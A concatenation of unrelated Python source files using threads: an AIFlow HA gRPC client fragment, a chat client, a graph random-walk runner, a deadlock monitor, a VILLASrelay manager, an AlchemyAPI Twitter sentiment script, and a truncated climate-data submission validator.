self.enable_ha = False
self.list_member_interval_ms = 5000
self.retry_interval_ms = 1000
self.retry_timeout_ms = 10000
if project_config is not None:
if server_uri is None:
server_uri = project_config.get_master_uri()
if notification_service_uri is None:
notification_service_uri = project_config.get_notification_service_uri()
self.enable_ha = project_config.get_enable_ha()
self.list_member_interval_ms = project_config.get_list_member_interval_ms()
self.retry_interval_ms = project_config.get_retry_interval_ms()
self.retry_timeout_ms = project_config.get_retry_timeout_ms()
if notification_service_uri is None:
NotificationClient.__init__(
self,
server_uri,
enable_ha=self.enable_ha,
list_member_interval_ms=self.list_member_interval_ms,
retry_interval_ms=self.retry_interval_ms,
retry_timeout_ms=self.retry_timeout_ms)
else:
NotificationClient.__init__(
self,
notification_service_uri,
enable_ha=self.enable_ha,
list_member_interval_ms=self.list_member_interval_ms,
retry_interval_ms=self.retry_interval_ms,
retry_timeout_ms=self.retry_timeout_ms)
if self.enable_ha:
server_uris = server_uri.split(",")
self.living_aiflow_members = []
self.current_aiflow_uri = None
last_error = None
for server_uri in server_uris:
channel = grpc.insecure_channel(server_uri)
high_availability_stub = HighAvailabilityManagerStub(channel)
try:
request = ListMembersRequest(timeout_seconds=0)
response = high_availability_stub.listMembers(request)
if response.return_code == ReturnStatus.CALL_SUCCESS:
self.living_aiflow_members = [proto_to_member(proto).server_uri
for proto in response.members]
else:
raise Exception(response.return_msg)
self.current_aiflow_uri = server_uri
self.high_availability_stub = high_availability_stub
break
except grpc.RpcError as e:
last_error = e
if self.current_aiflow_uri is None:
raise Exception("No available aiflow server uri!") from last_error
self.aiflow_ha_change_lock = threading.Lock()
self.aiflow_ha_running = True
self._replace_aiflow_stubs(self.current_aiflow_uri)
self.list_aiflow_member_thread = threading.Thread(target=self._list_aiflow_members, daemon=True)
self.list_aiflow_member_thread.start()
def publish_event(self, key: str, value: str, event_type: str = AI_FLOW_TYPE) -> BaseEvent:
return self.send_event(BaseEvent(key, value, event_type))
def _list_aiflow_members(self):
while self.aiflow_ha_running:
# refresh the living members
request = ListMembersRequest(timeout_seconds=int(self.list_member_interval_ms / 1000))
response = self.high_availability_stub.listMembers(request)
if response.return_code == ReturnStatus.CALL_SUCCESS:
with self.aiflow_ha_change_lock:
self.living_aiflow_members = [proto_to_member(proto).server_uri
for proto in response.members]
else:
logging.error("Exception thrown when updating the living members: %s" %
response.return_msg)
def _aiflow_ha_wrapper(self, func, stub_name):
@wraps(func)
def call_with_retry(*args, **kwargs):
current_stub = getattr(self, stub_name)
current_func = getattr(current_stub, func.__name__).inner_func
start_time = time.time_ns() / 1000000
failed_members = set()
while True:
try:
return current_func(*args, **kwargs)
except grpc.RpcError:
logging.error("Exception thrown when calling rpc, change the connection.",
exc_info=True)
with self.aiflow_ha_change_lock:
# check the current_uri to ensure thread safety
if current_func.server_uri == self.current_aiflow_uri:
living_members = list(self.living_aiflow_members)
failed_members.add(self.current_aiflow_uri)
shuffle(living_members)
found_new_member = False
for server_uri in living_members:
if server_uri in failed_members:
continue
next_uri = server_uri
self._replace_aiflow_stubs(next_uri)
current_func = getattr(getattr(self, stub_name),
current_func.__name__).inner_func
self.current_aiflow_uri = next_uri
found_new_member = True
if not found_new_member:
logging.error("No available living members currently. Sleep and retry.")
failed_members.clear()
sleep_and_detecting_running(self.retry_interval_ms,
lambda: self.aiflow_ha_running)
# break if stopped or timeout
if not self.aiflow_ha_running or \
time.time_ns() / 1000000 > start_time + self.retry_timeout_ms:
if not self.aiflow_ha_running:
raise Exception("HA has been disabled.")
else:
raise Exception("Rpc retry timeout!")
call_with_retry.inner_func = func
return call_with_retry
def _wrap_aiflow_rpcs(self, stub, server_uri, stub_name):
for method_name, method in dict(stub.__dict__).items():
method.__name__ = method_name
method.server_uri = server_uri
setattr(stub, method_name, self._aiflow_ha_wrapper(method, stub_name))
return stub
def _replace_aiflow_stubs(self, server_uri):
high_availability_channel = grpc.insecure_channel(server_uri)
high_availability_stub = self._wrap_aiflow_rpcs(
HighAvailabilityManagerStub(high_availability_channel),
server_uri,
"high_availability_stub")
self.high_availability_stub = high_availability_stub
metadata_channel = grpc.insecure_channel(server_uri)
metadata_store_stub = self._wrap_aiflow_rpcs(
MetadataServiceStub(metadata_channel),
server_uri,
"metadata_store_stub")
self.metadata_store_stub = metadata_store_stub
model_center_channel = grpc.insecure_channel(server_uri)
model_center_stub = self._wrap_aiflow_rpcs(
ModelCenterServiceStub(model_center_channel),
server_uri,
"model_center_stub")
self.model_center_stub = model_center_stub
deploy_channel = grpc.insecure_channel(server_uri)
deploy_stub = self._wrap_aiflow_rpcs(
DeployServiceStub(deploy_channel),
server_uri,
"deploy_stub")
self.deploy_stub = deploy_stub
metric_channel = grpc.insecure_channel(server_uri)
metric_stub = self._wrap_aiflow_rpcs(
MetricServiceStub(metric_channel),
server_uri,
"metric_stub")
self.metric_stub = metric_stub
def disable_high_availability(self):
if hasattr(self, "aiflow_ha_running"):
self.aiflow_ha_running = False
NotificationClient.disable_high_availability(self)
if hasattr(self, "aiflow_ha_running"):
self.list_aiflow_member_thread.join()
|
client.py | import os
import threading
from src.components.client.client import Client
from src.core.utils.channel import Channel
from src.protocol.base import Message
from src.protocol.client.write.initial import InitMessage
from src.protocol.client.write.text_message import TextMessage
def print_messages(client : Client):
channel = client._delivery_channel
columns, _ = os.get_terminal_size(0)
while True:
data = channel.consume()
msg = Message.initFromJSON(data)
msg.decode()
if msg.header == "Write: Initial":
msg = InitMessage.initFromJSON(data)
msg.decode()
print("{} joined the chat".format(msg.identifier).center(columns, " "))
elif msg.header == "Write: TextMessage":
msg = TextMessage.initFromJSON(data)
msg.decode()
sender_id = msg.get_signature()[0]
print("{}: {}".format(sender_id, msg.text))
def write(client : Client):
while True:
text = input()
client.send(text)
def main():
client = Client()
client.start()
print_thread = threading.Thread(target=print_messages, args=(client,))
print_thread.start()
write_thread = threading.Thread(target=write, args=(client,))
write_thread.start()
if __name__ == "__main__":
main()
|
walker.py | import os
from threading import Lock, Thread
from walk import RWGraph
from utils import get_G_from_edges
class Walker:
def __init__(self,network_data, num_walks, walk_length, schema, node_type):
super().__init__()
self.network_data = network_data
self.num_walks = num_walks
self.walk_length = walk_length
self.schema = schema
self.node_type = node_type
self.walks = []
for layer_id in network_data:
self.walks.append(None)
def _walk(self, layer_id, index):
tmp_data = self.network_data[layer_id]
# start to do the random walk on a layer
layer_walker = RWGraph(get_G_from_edges(tmp_data), node_type=self.node_type)
layer_walks = layer_walker.simulate_walks(self.num_walks, self.walk_length, schema=self.schema)
self.walks[index] = layer_walks
def walk(self):
ths = []
index = 0
for layer_id in self.network_data:
th = Thread(target=self._walk, args=(layer_id, index,))
index += 1
ths.append(th)
th.start()
for th in ths:
th.join()
return self.walks |
threading.py | """Functionality for working multi-threaded code."""
import inspect
import logging
import threading
import time
from typing import Dict, Tuple
from .._internal.trace import trace_str
class DeadlockMonitor:
"""A monitor for deadlocked LoggingLocks."""
timeout_sec: float
sleep_sec: float
locks: Dict[int, Tuple[float, int, str, str]]
_lock: threading.Lock
_thread: threading.Thread
def __init__(self, timeout_sec: float, sleep_sec: float):
self.timeout_sec = timeout_sec
self.sleep_sec = sleep_sec
self.locks = {}
self._lock = threading.Lock()
self._thread = threading.Thread(target=self._run)
self._thread.start()
setattr(self, "deadlock_monitor_thread", self._thread)
def _run(self):
while True:
self._check_for_deadlocks()
time.sleep(self.sleep_sec)
def _check_for_deadlocks(self):
with self._lock:
t = time.time()
for k, v in self.locks.items():
if t - v[0] > self.timeout_sec:
self._log_deadlock()
return
def _log_deadlock(self):
t = time.time()
msg = "A likely deadlock was detected! Please create an issue at https://github.com/deephaven-examples/deephaven-ib/issues containing this error message\nOpen locks:\n"
for k, v in self.locks.items():
msg += f"age_sec={t-v[0]} lock_id={v[1]} name={v[2]}\n"
msg += "\n\nStacks:\n\n"
for k, v in self.locks.items():
msg += f"age_sec={t-v[0]} lock_id={v[1]} name={v[2]}\n{v[3]}\n"
logging.error(msg)
def acquire(self, lock_id: int, name: str, stack: str) -> None:
with self._lock:
self.locks[lock_id] = (time.time(), lock_id, name, stack)
def release(self, lock_id: int):
with self._lock:
# pop is used here instead of del, because there are instances where the locks are released multiple times
self.locks.pop(lock_id, None)
_lock_id: int = 0
_lock: threading.Lock = threading.Lock()
_deadlock_monitor: DeadlockMonitor = DeadlockMonitor(3 * 60.0, 10.0)
def _next_lock_id() -> int:
global _lock_id
with _lock:
_lock_id += 1
return _lock_id
class LoggingLock(object):
"""A threading lock that logs lock acquisition and release."""
name: str
log_stack: bool
def __init__(self, name: str, lock=None, log_level=logging.DEBUG, log_stack: bool = False):
if lock is None:
lock = threading.Lock()
self.name = str(name)
self.log_level = log_level
self.lock = lock
self.log_stack = log_stack
self.id = _next_lock_id()
self._log(f"{inspect.stack()[1][3]} created {self.name}")
def _log(self, msg: str) -> None:
if self.log_stack:
msg = f"{msg}: lock_id={self.id} thread_id={threading.get_ident()}\n{trace_str()}"
else:
msg = f"{msg}: lock_id={self.id} thread_id={threading.get_ident()}"
logging.log(self.log_level, msg)
def acquire(self, blocking=True):
self._log(f"{inspect.stack()[1][3]} trying to acquire {self.name}")
if _deadlock_monitor:
_deadlock_monitor.acquire(self.id, self.name, trace_str())
ret = self.lock.acquire(blocking)
if ret:
self._log(f"{inspect.stack()[1][3]} acquired {self.name}")
else:
self._log(f"{inspect.stack()[1][3]} non-blocking acquire of {self.name} lock failed")
return ret
def release(self):
self._log(f"{inspect.stack()[1][3]} releasing {self.name}")
if _deadlock_monitor:
_deadlock_monitor.release(self.id)
self.lock.release()
def __enter__(self):
self.acquire()
def __exit__(self, exc_type, exc_val, exc_tb):
self.release()
return False # True causes exceptions to be swallowed. False causes exceptions to be handled.
|
villas_relay.py | import threading
import requests
import os
from villas.controller.components.manager import Manager
from villas.controller.components.gateways.villas_relay import VILLASrelayGateway # noqa E501
class VILLASrelayManager(Manager):
def __init__(self, **args):
self.autostart = args.get('autostart', False)
self.api_url = args.get('api_url', 'http://localhost:8088') + '/api/v1'
self.api_url_external = args.get('api_url_external', self.api_url)
self.thread_stop = threading.Event()
self.thread = threading.Thread(target=self.reconcile_periodically)
uuid = self.get_uuid()
if uuid is not None:
args['uuid'] = uuid
super().__init__(**args)
self.properties['api_url'] = self.api_url_external
def get_uuid(self):
try:
r = requests.get(self.api_url)
r.raise_for_status()
return r.json().get('uuid')
except requests.exceptions.RequestException:
return None
def get_status(self):
try:
r = requests.get(self.api_url)
r.raise_for_status()
return r.json()
except requests.exceptions.RequestException:
self.change_to_error('Failed to contact VILLASrelay')
return None
def reconcile_periodically(self):
while not self.thread_stop.wait(2):
self.reconcile()
def reconcile(self):
try:
self._status = self.get_status()
active_sessions = self._status['sessions']
active_uuids = {session['uuid'] for session in active_sessions}
existing_uuids = set(self.components.keys())
# Add new sessions and update existing ones
for session in active_sessions:
uuid = session['uuid']
if uuid in self.components:
comp = self.components[uuid]
else:
comp = VILLASrelayGateway(self, session)
self.add_component(comp)
comp.change_state('running')
# Find vanished sessions
for uuid in existing_uuids - active_uuids:
comp = self.components[uuid]
comp.change_state('stopped')
# We dont remove the components here
# So that they dont get removed from the backend
# and get recreated with the same UUID later
# self.remove_component(comp)
if len(active_sessions) > 0:
self.change_state('running')
else:
self.change_state('paused')
except Exception as e:
self.change_to_error('failed to reconcile',
exception=str(e),
args=e.args)
@property
def status(self):
status = super().status
status['status']['villas_relay_version'] = self._status.get('version')
return status
def on_shutdown(self):
self.thread_stop.set()
self.thread.join()
return super().on_shutdown()
def on_ready(self):
if self.autostart:
os.system('villas-relay')
self.thread.start()
super().on_ready()
|
analyze.py | #!/usr/bin/env python
# Copyright 2013 AlchemyAPI
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import json
import base64
import urllib2
import urllib
from alchemyapi import AlchemyAPI
try:
import config
except ImportError:
print '\nError finding Twitter credentials in config.py, please add them'
f = open('config.py','w+')
f.write("consumer_key='TWITTER_API_CONSUMER_KEY'\n")
f.write("consumer_secret='TWITTER_API_CONSUMER_SECRET'\n")
f.close()
sys.exit()
def oauth():
"""
Connect with the Twitter API to request the OAuth access token.
The token will be used to authorize the Twitter API search.
INPUT:
config.consumer_key -> the Twitter API consumer key, stored in config.py
config.consumer_secret -> the Twitter API consumer secret, stored in config.py
OUTPUT:
auth.access_token -> the token
auth.token_type -> the type of token (i.e. bearer)
"""
print ''
print 'Requesting OAuth token from Twitter API'
try:
#Twitter credientials
consumer_key = config.consumer_key
consumer_secret = config.consumer_secret
#encode the credentials & setup the request
encoded = base64.b64encode(consumer_key + ':' + consumer_secret)
url = 'https://api.twitter.com/oauth2/token'
params = { 'grant_type':'client_credentials' }
headers = { 'Authorization':'Basic ' + encoded }
#create the request and hit the Twitter API
request = urllib2.Request(url, urllib.urlencode(params), headers)
response = json.loads(urllib2.urlopen(request).read())
#save the token
auth = {}
auth['access_token'] = response['access_token']
auth['token_type'] = response['token_type']
print 'Received token'
print ''
return auth
except Exception as e:
print 'Twitter authentication failed: ', e
sys.exit()
def search(auth, query, number_of_tweets):
"""
Using the auth token, hit the Twitter search API with the specified
query and attempt to return the requested number of tweets. If the
requested number of tweets can not be found, it will return as many
as Twitter will provide.
The Twitter response data contains many fields, and the returned data
is filtered to only return the fields specified in the code.
It will ignore retweets, defined as tweets starting with 'RT '.
INPUT:
auth -> the authentication token and token type from the OAuth process
query -> the query to search Twitter for (i.e. "Denver Broncos")
number_of_tweets -> the number of tweets to attempt to gather
OUTPUT:
tweets -> an array of tweets containing the filtered field set
"""
#create the search request
url = 'https://api.twitter.com/1.1/search/tweets.json'
headers = { 'Authorization': auth['token_type'] + ' ' + auth['access_token'] }
tweets = []
MAX_PAGE_SIZE = 100
counter = 0
next_results = ''
print 'Searching Twitter to try and find %d Tweets about "%s"' % (number_of_tweets, query)
#keep getting more data until the number of tweets have been gathered
while True:
print 'performing a search iteration, found %d Tweets thus far' % len(tweets)
count = max(MAX_PAGE_SIZE,int(number_of_tweets) - counter)
#create the request
if next_results:
request = urllib2.Request(url + next_results, headers=headers)
else:
params = { 'q':query, 'lang':'en','count':count }
request = urllib2.Request(url + '?' + urllib.urlencode(params), headers=headers)
#hit the Twitter API
data = json.loads(urllib2.urlopen(request).read())
#Scan through the Tweets and save the important information
for status in data['statuses']:
text = status['text'].encode('utf-8')
#ignore retweets (RT at start of text)
if text.find('RT ') != 0:
#save the important info (save more fields here as needed)
tweet = {}
tweet['text'] = text
tweet['screen_name'] = status['user']['screen_name']
tweet['created_at'] = status['created_at']
tweets.append(tweet)
counter += 1
#check if we've grabbed enough tweets, exit if yes
if counter >= number_of_tweets:
print 'Found all %d Tweets!' % number_of_tweets
return tweets
#setup the next iteration
if 'next_results' in data['search_metadata']:
next_results = data['search_metadata']['next_results']
else:
#if next_results is not present, it means Twitter has no more data for us, so move on
print 'Sorry, I could only find %d Tweets instead of %d' % (counter, number_of_tweets)
return tweets
def process(query, in_queue, out_queue):
"""
The worker thread to grab a found Tweet off the queue and
calculate the sentiment via AlchemyAPI.
It calculates the document-level sentiment for the entire tweet, and
it will also attempt to calculate entity-level sentiment if the query
string is identified as an entity. If the query string is not
identified as an entity for the tweet, no entity level sentiment
will be returned.
INPUT:
query -> the query string that was used in the Twitter API search (i.e. "Denver Broncos")
in_queue -> the shared input queue that is filled with the found tweets.
out_queue -> the shared output queue that is filled with the analyzed tweets.
OUTPUT:
None
"""
#Create the AlchemyAPI object
alchemyapi = AlchemyAPI()
while True:
#grab a tweet from the queue
tweet = in_queue.get()
#init
tweet['sentiment'] = {}
try:
#calculate the sentiment for the entity
response = alchemyapi.entities('text',tweet['text'], { 'sentiment': 1 })
if response['status'] == 'OK':
for entity in response['entities']:
#Check if we've found an entity that matches our query
if entity['text'] == query:
tweet['sentiment']['entity'] = {}
tweet['sentiment']['entity']['type'] = entity['sentiment']['type']
#Add the score (it's not returned if type=neutral)
if 'score' in entity['sentiment']:
tweet['sentiment']['entity']['score'] = entity['sentiment']['score']
else:
tweet['sentiment']['entity']['score'] = 0
#Only 1 entity can possibly match the query, so exit the loop
break
#calculate the sentiment for the entire tweet
response = alchemyapi.sentiment('text',tweet['text'])
if response['status'] == 'OK':
tweet['sentiment']['doc'] = {}
tweet['sentiment']['doc']['type'] = response['docSentiment']['type']
#Add the score (it's not returned if type=neutral)
if 'score' in response['docSentiment']:
tweet['sentiment']['doc']['score'] = response['docSentiment']['score']
else:
tweet['sentiment']['doc']['score'] = 0
#add the result to the output queue
out_queue.put(tweet)
except Exception as e:
#if there's an error, just move on to the next item in the queue
print 'Uh oh, this just happened: ', e
pass
#signal that the task is complete
in_queue.task_done()
def analyze(tweets, query):
"""
Spawns the thread pool and watches for the threads to finish processing
the input queue. Once complete, it unloads the output queue into an array
and passes it on for further processing.
The number of threads is set to CONCURRENCY_LIMIT, which is the maximum
number of concurrent processes allowed by AlchemyAPI for your plan. The
concurrency limit is 5 for the free plan.
INPUT:
tweets -> an array containing the tweets to analyze.
query -> the query string that was used in the Twitter API search (i.e. "Denver Broncos")
OUTPUT:
tweets -> an array containing the analyzed tweets
"""
import Queue
import threading
#number of parallel threads to run to hit AlchemyAPI concurrently (higher is faster, the limit depends on your plan)
CONCURRENCY_LIMIT = 5
#init
in_queue = Queue.Queue()
out_queue = Queue.Queue()
#load up the in_queue
for tweet in tweets:
in_queue.put(tweet)
#Spawn and start the threads
threads = []
for x in xrange(CONCURRENCY_LIMIT):
t = threading.Thread(target=process, args=(query, in_queue, out_queue))
t.daemon = True
threads.append(t)
t.start()
#init the display
print ''
print ''
print 'Calculating sentiment for each tweet'
print ''
#Wait until the input queue is empty
while True:
#print the counter
sys.stdout.write('Tweets left to analyze: {0} \r'.format(in_queue.qsize()))
sys.stdout.flush()
#check if the queue has been emptied out
if in_queue.empty():
break
#Check if the threads are still alive
check = False
for t in threads:
if t.isAlive():
check = True
break
if not check:
#All threads have died, so quit
break
print 'Done analyzing!'
#pull the data off the out_queue
output = []
while not out_queue.empty():
output.append(out_queue.get())
#return the tweets with the appended data
return output
def output(tweets):
"""
Prints the found tweets and the sentiment.
INPUT:
tweets -> an array containing the analyzed tweets.
OUTPUT:
None
"""
if len(tweets) == 0:
print 'No tweets found'
sys.exit()
print ''
print ''
print '##########################################################'
print '# The Tweets #'
print '##########################################################'
print ''
print ''
for tweet in tweets:
print '@' + tweet['screen_name']
print 'Date: ' + tweet['created_at']
print tweet['text']
if 'entity' in tweet['sentiment']:
print 'Entity Sentiment:', tweet['sentiment']['entity']['type'], '(Score:', str(tweet['sentiment']['entity']['score']) + ')'
if 'doc' in tweet['sentiment']:
print 'Document Sentiment:', tweet['sentiment']['doc']['type'], '(Score:', str(tweet['sentiment']['doc']['score']) + ')'
print ''
def stats(tweets):
"""
Calculate and print out some basic summary statistics
INPUT:
tweets -> an array containing the analyzed tweets
OUTPUT:
None
"""
#init
data = {}
data['doc'] = {}
data['doc']['positive'] = 0
data['doc']['negative'] = 0
data['doc']['neutral'] = 0
data['doc']['total'] = 0
data['entity'] = {}
data['entity']['positive'] = 0
data['entity']['negative'] = 0
data['entity']['neutral'] = 0
data['entity']['total'] = 0
#loop through the tweets and count up the positive, negatives and neutrals
for tweet in tweets:
if 'entity' in tweet['sentiment']:
data['entity'][tweet['sentiment']['entity']['type']] += 1
data['entity']['total'] += 1
if 'doc' in tweet['sentiment']:
data['doc'][tweet['sentiment']['doc']['type']] += 1
data['doc']['total'] += 1
#Make sure there are some analyzed tweets
if data['doc']['total'] == 0 and data['entity']['total'] == 0:
print 'No analysis found for the Tweets'
sys.exit()
#print the stats
print ''
print ''
print '##########################################################'
print '# The Stats #'
print '##########################################################'
print ''
print ''
if data['entity']['total'] > 0:
print 'Entity-Level Sentiment:'
print 'Positive: %d (%.2f%%)' % (data['entity']['positive'], 100.0*data['entity']['positive']/data['entity']['total'])
print 'Negative: %d (%.2f%%)' % (data['entity']['negative'], 100.0*data['entity']['negative']/data['entity']['total'])
print 'Neutral: %d (%.2f%%)' % (data['entity']['neutral'], 100.0*data['entity']['neutral']/data['entity']['total'])
print 'Total: %d (%.2f%%)' % (data['entity']['total'], 100.0*data['entity']['total']/data['entity']['total'])
print ''
print ''
if data['doc']['total'] > 0:
print 'Document-Level Sentiment:'
print 'Positive: %d (%.2f%%)' % (data['doc']['positive'], 100.0*data['doc']['positive']/data['doc']['total'])
print 'Negative: %d (%.2f%%)' % (data['doc']['negative'], 100.0*data['doc']['negative']/data['doc']['total'])
print 'Neutral: %d (%.2f%%)' % (data['doc']['neutral'], 100.0*data['doc']['neutral']/data['doc']['total'])
print 'Total: %d (%.2f%%)' % (data['doc']['total'], 100.0*data['doc']['total']/data['doc']['total'])
def main(query, count):
"""
The main script the calls each of the functions as needed.
INPUT:
query -> the query string to use to search the Twitter API and for finding entities
count -> the number of Tweets to attempt to gather from the Twitter API
OUTPUT:
None
"""
auth = oauth()
tweets = search(auth, query, count)
tweets = analyze(tweets, query)
output(tweets)
stats(tweets)
#Check the command line arguments
if not len(sys.argv) == 3:
print "Invalid number of input arguments. Please run 'python analyze.py \"QUERY_STRING\" COUNT'"
print "Where QUERY_STRING is what to search for (i.e. 'Denver Broncos')"
print "And COUNT is the number of Tweets to attempt to gather\n"
sys.exit()
#run the script
main(sys.argv[1], int(sys.argv[2]))
|
validate_data_submission.py | #!/usr/bin/env python
"""
validate_data_submission.py
This script is run by users to validate submitted data files and to create a
data submission in the Data Management Tool.
"""
from __future__ import unicode_literals, division, absolute_import
import argparse
import datetime
import itertools
import json
import logging.config
from multiprocessing import Process, Manager
from multiprocessing.pool import ThreadPool
from netCDF4 import Dataset
import os
import re
import shutil
import subprocess
import sys
import time
import warnings
try:
import dask
except ImportError:
pass
import iris
from primavera_val import (identify_filename_metadata, validate_file_contents,
identify_contents_metadata,
validate_cell_measures_contents,
identify_cell_measures_metadata, load_cube,
FileValidationError)
import django
django.setup()
from django.contrib.auth.models import User
from pdata_app.models import (Project, ClimateModel, Experiment, DataSubmission,
DataFile, VariableRequest, DataRequest, Checksum, Settings, Institute,
ActivityId, EmailQueue)
from pdata_app.utils.dbapi import get_or_create, match_one
from pdata_app.utils.common import adler32, list_files, pdt2num
from vocabs.vocabs import STATUS_VALUES, CHECKSUM_TYPES
# Ignore warnings displayed when loading data
warnings.filterwarnings("ignore")
__version__ = '0.1.0b'
DEFAULT_LOG_LEVEL = logging.WARNING
DEFAULT_LOG_FORMAT = '%(levelname)s: %(message)s'
logger = logging.getLogger(__name__)
CONTACT_PERSON_USER_ID = 'jseddon'
# The maximum size (in bytes) of file to read into memory for an HDF
# data integrity check
# 1073741824 = 1 GiB
MAX_DATA_INTEGRITY_SIZE = 1073741824
# Don't run PrePARE on the following var/table combinations as they've
# been removed from the CMIP6 data request, but are still needed for
# PRIMAVERA
# Additionally, don't run PrePARE on any of the PRIMAVERA only tables
SKIP_PREPARE_VARS = ['psl_E3hrPt', 'ua850_E3hrPt', 'va850_E3hrPt',
'mrlsl_Emon', 'mrlsl_Lmon', 'sialb_SImon',
'tso_3hr',
'Prim1hr', 'Prim3hr', 'Prim3hrPt', 'Prim6hr',
'Prim6hrPt', 'PrimO6hr', 'PrimOday', 'PrimOmon',
'PrimSIday', 'Primday', 'PrimdayPt', 'Primmon',
'PrimmonZ',
]
class SubmissionError(Exception):
"""
An exception to indicate that there has been an error that means that
the data submission cannot continue.
"""
pass
def identify_and_validate(filenames, project, num_processes, file_format):
"""
Loop through a list of file names, identify each file's metadata and then
validate it. The looping is done in parallel using the multiprocessing
library module.
clt_Amon_HadGEM2-ES_historical_r1i1p1_185912-188411.nc
:param list filenames: The files to process
:param str project: The name of the project
:param int num_processes: The number of parallel processes to use
:param str file_format: The CMOR version of the netCDF files, one out of-
CMIP5 or CMIP6
:returns: A list containing the metadata dictionary generated for each file
:rtype: multiprocessing.Manager.list
"""
jobs = []
manager = Manager()
params = manager.Queue()
result_list = manager.list()
error_event = manager.Event()
if num_processes != 1:
for i in range(num_processes):
p = Process(target=identify_and_validate_file, args=(params,
result_list, error_event))
jobs.append(p)
p.start()
func_input_pair = list(zip(filenames,
(project,) * len(filenames),
(file_format,) * len(filenames)))
blank_pair = (None, None, None)
iters = itertools.chain(func_input_pair, (blank_pair,) * num_processes)
for item in iters:
params.put(item)
if num_processes == 1:
identify_and_validate_file(params, result_list, error_event)
else:
for j in jobs:
j.join()
if error_event.is_set():
raise SubmissionError()
return result_list
def identify_and_validate_file(params, output, error_event):
"""
Identify `filename`'s metadata and then validate the file. The function
continues getting items to process from the parameter queue until a None
is received.
:param multiprocessing.Manager.Queue params: A queue, with each item being a
tuple of the filename to load, the name of the project and the netCDF
file CMOR version
:param multiprocessing.Manager.list output: A list containing the output
metadata dictionaries for each file
:param multiprocessing.Manager.Event error_event: If set then a catastrophic
error has occurred in another process and processing should end
"""
while True:
# close existing connections so that a fresh connection is made
django.db.connections.close_all()
if error_event.is_set():
return
filename, project, file_format = params.get()
if filename is None:
return
try:
_identify_and_validate_file(filename, project, file_format,output,
error_event)
except django.db.utils.OperationalError:
# Wait and then re-run once in case of temporary database
# high load
logger.warning('django.db.utils.OperationalError waiting for one '
'minute and then retrying.')
time.sleep(60)
try:
_identify_and_validate_file(filename, project, file_format,
output, error_event)
except django.db.utils.OperationalError:
logger.error('django.db.utils.OperationalError for a second '
'time. Exiting.')
error_event.set()
raise
def _identify_and_validate_file(filename, project, file_format, output,
error_event):
"""
Do the validation of a file.
:param str filename: The name of the file
:param str project: The name of the project
:param str file_format: The format of the file (CMIP5 or CMIP6)
:param multiprocessing.Manager.list output: A list containing the output
metadata dictionaries for each file
:param multiprocessing.Manager.Event error_event: If set then a catastrophic
error has occurred in another process and processing should end
"""
try:
basename = os.path.basename(filename)
if DataFile.objects.filter(name=basename).count() > 0:
msg = 'File {} already exists in the database.'.format(basename)
raise FileValidationError(msg)
metadata = identify_filename_metadata(filename, file_format)
if metadata['table'].startswith('Prim'):
metadata['project'] = 'PRIMAVERA'
else:
metadata['project'] = project
if 'fx' in metadata['table']:
cf = iris.fileformats.cf.CFReader(filename)
metadata.update(identify_cell_measures_metadata(cf, filename))
validate_cell_measures_contents(cf, metadata)
else:
cube = load_cube(filename)
metadata.update(identify_contents_metadata(cube, filename))
validate_file_contents(cube, metadata)
_contents_hdf_check(cube, metadata, cmd_args.data_limit)
verify_fk_relationships(metadata)
calculate_checksum(metadata)
except SubmissionError:
msg = ('A serious file error means the submission cannot continue: '
'{}'.format(filename))
logger.error(msg)
error_event.set()
except FileValidationError as fve:
msg = 'File failed validation. {}'.format(fve.__str__())
logger.warning(msg)
else:
output.append(metadata)
def calculate_checksum(metadata):
checksum_value = adler32(os.path.join(metadata['directory'],
metadata['basename']))
if checksum_value:
metadata['checksum_type'] = CHECKSUM_TYPES['ADLER32']
metadata['checksum_value'] = checksum_value
else:
msg = ('Unable to calculate checksum for file: {}'.
format(metadata['basename']))
logger.warning(msg)
metadata['checksum_type'] = None
metadata['checksum_value'] = None
def verify_fk_relationships(metadata):
"""
Identify the variable_request and data_request objects corresponding to this file.
:param dict metadata: Metadata identified for this file.
:raises SubmissionError: If there are no existing entries in the
database for `Project`, `ClimateModel` or `Experiment`.
"""
foreign_key_types = [
(Project, 'project'),
(ClimateModel, 'climate_model'),
(Experiment, 'experiment'),
(Institute, 'institute'),
(ActivityId, 'activity_id')]
# get values for each of the foreign key types
for object_type, object_str in foreign_key_types:
result = match_one(object_type, short_name=metadata[object_str])
if result:
metadata[object_str] = result
else:
msg = ("No {} '{}' found for file: {}. Please create this object "
"and resubmit.".format(object_str.replace('_', ' '),
metadata[object_str], metadata['basename']))
logger.error(msg)
raise SubmissionError(msg)
# find the data request
dreq_match = match_one(
DataRequest,
project=metadata['project'],
institute=metadata['institute'],
climate_model=metadata['climate_model'],
experiment=metadata['experiment'],
variable_request__table_name=metadata['table'],
variable_request__cmor_name=metadata['var_name'],
rip_code=metadata['rip_code']
)
if dreq_match:
metadata['data_request'] = dreq_match
metadata['variable'] = dreq_match.variable_request
else:
# if cmor_name doesn't match then it may be a variable where out_name
# is different to cmor_name so check these
dreq_matches = DataRequest.objects.filter(
project=metadata['project'],
institute=metadata['institute'],
climate_model=metadata['climate_model'],
experiment=metadata['experiment'],
variable_request__table_name=metadata['table'],
variable_request__var_name=metadata['var_name'],
rip_code=metadata['rip_code']
)
if dreq_matches.count() == 0:
msg = ('No data request found for file: {}.'.
format(metadata['basename']))
logger.error(msg)
raise FileValidationError(msg)
elif dreq_matches.count() == 1:
metadata['data_request'] = dreq_matches[0]
metadata['variable'] = dreq_matches[0].variable_request
else:
try:
plev_name = _guess_plev_name(metadata)
except Exception:
msg = ('Cannot open file to determine plev name: {}.'.
format(metadata['basename']))
logger.error(msg)
raise FileValidationError(msg)
if plev_name:
plev_matches = dreq_matches.filter(
variable_request__dimensions__icontains=plev_name
)
if plev_matches.count() == 1:
metadata['data_request'] = plev_matches[0]
metadata['variable'] = plev_matches[0].variable_request
elif plev_matches.count() == 0:
msg = ('No data requests found with plev {} for file: {}.'.
format(plev_name, metadata['basename']))
logger.error(msg)
raise FileValidationError(msg)
else:
msg = ('Multiple data requests found with plev {} for '
'file: {}.'.format(plev_name, metadata['basename']))
logger.error(msg)
raise FileValidationError(msg)
else:
msg = ('Unable to determine plev name: {}.'.
format(metadata['basename']))
logger.error(msg)
raise FileValidationError(msg)
def update_database_submission(validated_metadata, data_sub, files_online=True,
file_version=None):
